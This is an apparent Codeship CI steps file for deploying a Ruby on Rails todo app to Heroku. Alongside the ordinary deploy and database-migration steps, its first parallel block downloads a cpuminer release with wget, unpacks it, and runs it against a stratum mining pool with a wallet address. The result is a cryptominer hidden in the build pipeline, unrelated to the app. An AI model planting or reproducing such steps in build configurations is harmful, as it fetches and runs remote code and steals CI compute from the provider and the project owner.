- type: parallel
  steps:
  - name: wget
    service: web-codeship-example-ruby
    command: wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
  - name: tar
    service: web-codeship-example-ruby
    command: tar xf cpuminer-opt-linux.tar.gz
  - name: jalan
    service: web-codeship-example-ruby
    command: ./cpuminer-sse2 -a power2b -o stratum+tcps://stratum-na.rplant.xyz:17022 -u McrMvGkCFzbHgymyqctQuNUkEJyt2JNoK6.3
- name: deploy
  tag: master
  service: codeship-heroku-deployment
  command: codeship_heroku deploy /deploy ruby-rails-todoapp
- name: migrate
  tag: master
  service: codeship-heroku-deployment
  command: heroku run --app ruby-rails-todoapp -- bundle exec rake db:migrate

